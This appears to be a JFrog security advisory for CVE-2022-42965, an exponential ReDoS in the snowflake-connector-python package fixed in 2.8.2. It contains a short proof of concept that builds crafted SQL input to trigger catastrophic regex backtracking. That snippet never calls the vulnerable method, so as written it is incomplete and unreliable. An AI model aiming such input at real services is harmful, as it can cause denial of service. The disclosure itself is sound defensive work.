JFrog Security Research

XRAY-257185 - snowflake-connector-python ReDoS

CVE-2022-42965 | CVSS 3.7

JFrog Severity:low

Published 15 Oct. 2022 | Last updated 20 Nov. 2022

Exponential ReDoS in snowflake-connector-python leads to denial of service


snowflake-connector-python (,2.8.1], Fixed in 2.8.2

An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the snowflake-connector-python PyPI package, when an attacker is able to supply arbitrary input to the undocumented get_file_transfer_type method.

import time
from snowflake.connector.cursor import SnowflakeCursor

for i in range(100):
    start_time = time.time()
    sql = '/**/\n' + '\t/*/get\t*/\t/**/\n'*i + '\t*/get\n'
    print("--- %s seconds ---" % (time.time() - start_time))

No mitigations are supplied for this issue